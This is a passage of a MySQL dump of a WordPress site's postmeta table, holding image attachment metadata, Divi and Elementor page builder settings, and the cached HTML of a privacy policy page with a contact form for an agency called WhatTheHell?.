:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Artboard-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:22:\"Artboard-2-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:22:\"Artboard-2-600x675.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:22:\"Artboard-2-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:22:\"Artboard-2-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:22:\"Artboard-2-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:22:\"Artboard-2-480x640.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(882,730,'_wp_attached_file','2020/08/Artboard-Copy-6-1.jpg'),(883,730,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:800;s:4:\"file\";s:29:\"2020/08/Artboard-Copy-6-1.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Artboard-Copy-6-1-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Artboard-Copy-6-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:29:\"Artboard-Copy-6-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:29:\"Artboard-Copy-6-1-600x675.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:29:\"Artboard-Copy-6-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:29:\"Artboard-Copy-6-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:29:\"Artboard-Copy-6-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:29:\"Artboard-Copy-6-1-480x640.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(884,730,'_wp_attachment_image_alt',''),(885,733,'_wp_attached_file','2020/08/Artboard-Copy-7.jpg'),(886,733,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:800;s:4:\"file\";s:27:\"2020/08/Artboard-Copy-7.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Artboard-Copy-7-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Artboard-Copy-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:27:\"Artboard-Copy-7-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:27:\"Artboard-Copy-7-600x675.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:27:\"Artboard-Copy-7-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:27:\"Artboard-Copy-7-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:27:\"Artboard-Copy-7-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:27:\"Artboard-Copy-7-480x640.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(887,733,'_wp_attachment_image_alt','Sachin'),(890,749,'_edit_lock','1597747262:1'),(891,749,'_et_pb_use_builder','on'),(892,749,'_et_pb_old_content',''),(893,749,'_et_gb_content_width',''),(894,749,'amp_status',''),(895,749,'_edit_last','1'),(896,749,'amazon_polly_enable','0'),(897,749,'amazon_polly_audio_location',''),(898,749,'_et_post_bg_color','#ffffff'),(899,749,'_et_post_bg_layout','light'),(900,749,'_et_pb_show_title','on'),(901,749,'_et_pb_post_hide_nav','default'),(902,749,'_et_pb_page_layout','et_right_sidebar'),(903,749,'_et_pb_side_nav','off'),(904,749,'_et_pb_built_for_post_type','page'),(905,749,'_et_pb_ab_subjects',''),(906,749,'_et_pb_enable_shortcode_tracking',''),(907,749,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"749\" /]'),(908,749,'_et_pb_custom_css',''),(909,749,'_et_pb_gutter_width','3'),(910,749,'_thumbnail_id','0'),(911,749,'_et_pb_first_image',''),(912,749,'_et_pb_truncate_post',''),(913,749,'_et_pb_truncate_post_date',''),(914,749,'_et_builder_version','VB|Divi|4.5.6'),(915,749,'_et_pb_show_page_creation','off'),(916,749,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:16:\"et-gf-montserrat\";s:137:\"Montserrat:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}}'),(920,753,'_edit_lock','1597748081:1'),(921,753,'_et_pb_use_builder','on'),(922,753,'_et_gb_content_width',''),(923,753,'amp_status',''),(924,753,'_edit_last','1'),(925,753,'_et_pb_post_hide_nav','default'),(926,753,'_et_pb_page_layout','et_right_sidebar'),(927,753,'_et_pb_side_nav','off'),(928,753,'_et_pb_built_for_post_type','page'),(937,753,'_et_pb_ab_subjects',''),(938,753,'_et_pb_enable_shortcode_tracking',''),(939,753,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"753\" /]'),(940,753,'_et_pb_custom_css',''),(941,753,'_et_pb_gutter_width','3'),(942,753,'_thumbnail_id','0'),(943,753,'_et_pb_first_image',''),(944,753,'_et_pb_truncate_post','<p><div class=\"et_pb_section et_pb_section_4 et_animated et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_4 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_6  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_6 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Privacy Policy</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_divider_0 et_animated et_pb_space et_pb_divider_hidden\"><div class=\"et_pb_divider_internal\"></div></div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_5 et_animated et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_5\">\n				<div class=\"et_pb_column et_pb_column_2_3 et_pb_column_7  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_7 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\"><p>Requested Information<br />\nInformation is collected from you when you use e-mail forms to contact us, or when you contribute to or use some of the advanced features on the site. The information we collect is clearly identified on the web page on which we collect it. In addition, we may collect your IP address and use cookies unless you configure your web browser to not accept them.<br />\nThe WhatTheHell? website uses information request forms and e-mail options for visitors to request information or express their interest. We will not share, rent or sell your information to any third party, and will use reasonable efforts to maintain the confidentiality of the information you provide. Any information will be used for internal business purposes only, and to support your relationship with WhatTheHell?.<br />\nOpt Out<br />\nVisitors who request information may sign-up to receive future e-mail from WhatTheHell?. Those who sign-up for and those already receiving e-mail from WhatTheHell?, will always have the option to opt out of receiving messages included at the bottom of each e-mail.<br />\nThird-Party Sites<br />\nThis site may contain links to other websites.WhatTheHell? is not responsible for the privacy practices or the content of these sites. Policy statements will vary by site and you need to the check individual policies to understand them.<br />\nSecurity<br />\nWe utilize industry-standard encryption technologies when transferring and receiving user data exchanged with our site. We also have adequate security measures at our physical facilities to protect and retain information collected from you at our site.</p>\n<p>WhatTheHell?</p></div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_8  et_pb_css_mix_blend_mode_passthrough et-last-child et_pb_column_empty\">\n				\n				\n				\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_6 et_animated et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_6 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_9  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_8 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Let&#8217;s Start Something newSay Hello!</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_9 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_8 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_10  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				\n			<div id=\"et_pb_contact_form_0\" class=\"et_pb_module et_pb_contact_form_0 et_animated et_pb_contact_form_container clearfix\" data-form_unique_num=\"0\">\n				\n				\n				\n				<div class=\"et-pb-contact-message\"></div>\n				\n				<div class=\"et_pb_contact\">\n					<form class=\"et_pb_contact_form clearfix\" method=\"post\" action=\"https://wthtest1.in8.cdn-alpha.com/?s=1\">\n						<p class=\"et_pb_contact_field et_pb_contact_field_0 et_pb_contact_field_last\" data-id=\"name\" data-type=\"input\">\n				\n				\n				<label for=\"et_pb_contact_name_0\" class=\"et_pb_contact_form_label\">Name</label>\n				<input type=\"text\" id=\"et_pb_contact_name_0\" class=\"input\" value=\"\" name=\"et_pb_contact_name_0\" data-required_mark=\"required\" data-field_type=\"input\" data-original_id=\"name\" placeholder=\"Name\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_1 et_pb_contact_field_last\" data-id=\"mobile_no\" data-type=\"input\">\n				\n				\n				<label for=\"et_pb_contact_mobile_no_0\" class=\"et_pb_contact_form_label\">Mobile No</label>\n				<input type=\"text\" id=\"et_pb_contact_mobile_no_0\" class=\"input\" value=\"\" name=\"et_pb_contact_mobile_no_0\" data-required_mark=\"required\" data-field_type=\"input\" data-original_id=\"mobile_no\" placeholder=\"Mobile No\" pattern=\"[0-9s-]{10,10}\" title=\"Only numbers allowed.Minimum length: 10 characters. Maximum length: 10 characters.\" maxlength=\"10\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_2 et_pb_contact_field_last\" data-id=\"email\" data-type=\"email\">\n				\n				\n				<label for=\"et_pb_contact_email_0\" class=\"et_pb_contact_form_label\">Email Address</label>\n				<input type=\"text\" id=\"et_pb_contact_email_0\" class=\"input\" value=\"\" name=\"et_pb_contact_email_0\" data-required_mark=\"required\" data-field_type=\"email\" data-original_id=\"email\" placeholder=\"Email Address\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_3 et_pb_contact_field_last\" data-id=\"message\" data-type=\"text\">\n				\n				\n				<label for=\"et_pb_contact_message_0\" class=\"et_pb_contact_form_label\">Message</label>\n				<textarea name=\"et_pb_contact_message_0\" id=\"et_pb_contact_message_0\" class=\"et_pb_contact_message input\" data-required_mark=\"required\" data-field_type=\"text\" data-original_id=\"message\" placeholder=\"Message\"></textarea>\n			</p>\n						<input type=\"hidden\" value=\"et_contact_proccess\" name=\"et_pb_contactform_submit_0\"/>\n						<div class=\"et_contact_bottom_container\">\n							\n			<div class=\"et_pb_contact_right\">\n				<p class=\"clearfix\">\n					<span class=\"et_pb_contact_captcha_question\">14 + 12</span> = <input type=\"text\" size=\"2\" class=\"input et_pb_contact_captcha\" data-first_digit=\"14\" data-second_digit=\"12\" value=\"\" name=\"et_pb_contact_captcha_0\" data-required_mark=\"required\" autocomplete=\"off\">\n				</p>\n			</div><!-- .et_pb_contact_right -->\n							<button type=\"submit\" name=\"et_builder_submit_button\" class=\"et_pb_contact_submit et_pb_button et_pb_custom_button_icon\" data-icon=\"&#x45;\">Send</button>\n						</div>\n						<input type=\"hidden\" id=\"_wpnonce-et-pb-contact-form-submitted-0\" name=\"_wpnonce-et-pb-contact-form-submitted-0\" value=\"7705b7c209\" /><input type=\"hidden\" name=\"_wp_http_referer\" value=\"/?s=1\" />\n					</form>\n				</div> <!-- .et_pb_contact -->\n			</div> <!-- .et_pb_contact_form_container -->\n			\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --></p>\n'),(945,753,'_et_pb_truncate_post_date','2022-01-15 17:33:24'),(946,753,'_et_builder_version','VB|Divi|4.5.6'),(947,753,'_et_pb_show_page_creation','off'),(948,753,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:16:\"et-gf-montserrat\";s:137:\"Montserrat:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}}'),(949,760,'_menu_item_type','post_type'),(950,760,'_menu_item_menu_item_parent','0'),(951,760,'_menu_item_object_id','753'),(952,760,'_menu_item_object','page'),(953,760,'_menu_item_target',''),(954,760,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(955,760,'_menu_item_xfn',''),(956,760,'_menu_item_url',''),(958,236,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:16:\"et-gf-montserrat\";s:137:\"Montserrat:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}}'),(959,770,'_edit_lock','1612866267:1'),(960,770,'_last_editor_used_jetpack','block-editor'),(961,770,'_et_pb_use_builder','on'),(962,770,'_et_gb_content_width',''),(963,770,'spay_email',''),(964,770,'_edit_last','1'),(965,770,'_et_pb_post_hide_nav','default'),(966,770,'_et_pb_page_layout','et_right_sidebar'),(967,770,'_et_pb_side_nav','off'),(968,490,'_wp_attachment_image_alt','creative agency'),(969,392,'_last_editor_used_jetpack','block-editor'),(970,788,'_wp_attached_file','2021/03/banner-1.jpeg'),(971,788,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:728;s:4:\"file\";s:21:\"2021/03/banner-1.jpeg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"banner-1-300x213.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"banner-1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"banner-1-768x546.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:546;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:21:\"banner-1-400x250.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:22:\"banner-1-1024x675.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:21:\"banner-1-400x284.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:21:\"banner-1-510x382.jpeg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:21:\"banner-1-400x516.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:21:\"banner-1-980x697.jpeg\";s:5:\"width\";i:980;s:6:\"height\";i:697;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:21:\"banner-1-480x341.jpeg\";s:5:\"width\";i:480;s:6:\"height\";i:341;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(972,134,'_last_editor_used_jetpack','block-editor'),(973,796,'_wp_attached_file','2021/03/Bitmap-1.png'),(974,796,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:640;s:4:\"file\";s:20:\"2021/03/Bitmap-1.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Bitmap-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Bitmap-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:20:\"Bitmap-1-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:20:\"Bitmap-1-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:20:\"Bitmap-1-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:20:\"Bitmap-1-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:20:\"Bitmap-1-480x480.png\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(975,796,'_wp_attachment_image_alt','Dhiraj'),(976,808,'_wp_attached_file','2021/07/Logo-domainlelo.png'),(977,808,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1905;s:6:\"height\";i:474;s:4:\"file\";s:27:\"2021/07/Logo-domainlelo.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Logo-domainlelo-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"Logo-domainlelo-1024x255.png\";s:5:\"width\";i:1024;s:6:\"height\";i:255;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Logo-domainlelo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"Logo-domainlelo-768x191.png\";s:5:\"width\";i:768;s:6:\"height\";i:191;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:28:\"Logo-domainlelo-1536x382.png\";s:5:\"width\";i:1536;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:27:\"Logo-domainlelo-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:28:\"Logo-domainlelo-1080x474.png\";s:5:\"width\";i:1080;s:6:\"height\";i:474;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:27:\"Logo-domainlelo-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:27:\"Logo-domainlelo-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:28:\"Logo-domainlelo-1080x269.png\";s:5:\"width\";i:1080;s:6:\"height\";i:269;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:27:\"Logo-domainlelo-400x474.png\";s:5:\"width\";i:400;s:6:\"height\";i:474;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:28:\"Logo-domainlelo-1280x318.png\";s:5:\"width\";i:1280;s:6:\"height\";i:318;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:27:\"Logo-domainlelo-980x244.png\";s:5:\"width\";i:980;s:6:\"height\";i:244;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:27:\"Logo-domainlelo-480x119.png\";s:5:\"width\";i:480;s:6:\"height\";i:119;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(978,401,'_last_editor_used_jetpack','block-editor'),(979,809,'_wp_attached_file','2022/03/Artboard.png'),(980,809,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:128;s:6:\"height\";i:128;s:4:\"file\";s:20:\"2022/03/Artboard.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(981,329,'_oembed_054fb79ee49e228a5d5aa72684784e52','{{unknown}}'),(982,195,'_oembed_3de11fc998682d6af39333112b44706f','{{unknown}}'),(983,14,'_oembed_a447278964c298df50ce6c610fb90cba','{{unknown}}'),(984,11,'_oembed_980c203bd7838b521b761747c4ede054','{{unknown}}'),(985,815,'_elementor_edit_mode','builder'),(986,815,'_elementor_template_type','kit'),(987,816,'_elementor_edit_mode','builder'),(988,816,'_elementor_template_type','kit'),(989,817,'_elementor_edit_mode','builder'),(990,817,'_elementor_template_type','kit'),(991,818,'_elementor_edit_mode','builder'),(992,818,'_elementor_template_type','kit'),(993,819,'_elementor_edit_mode','builder'),(994,819,'_elementor_template_type','kit'),(995,820,'_elementor_edit_mode','builder'),(996,820,'_elementor_template_type','kit'),(997,821,'_wp_attached_file','2023/04/elementor-pro-3.12.2.zip'),(998,821,'_wp_attachment_context','upgrader'),(999,822,'_elementor_edit_mode','builder'),(1000,822,'_elementor_template_type','kit'),(1001,823,'_elementor_edit_mode','builder'),(1002,823,'_elementor_template_type','kit'),(1003,824,'_elementor_edit_mode','builder'),(1004,824,'_elementor_template_type','kit');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_posts`
--

DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
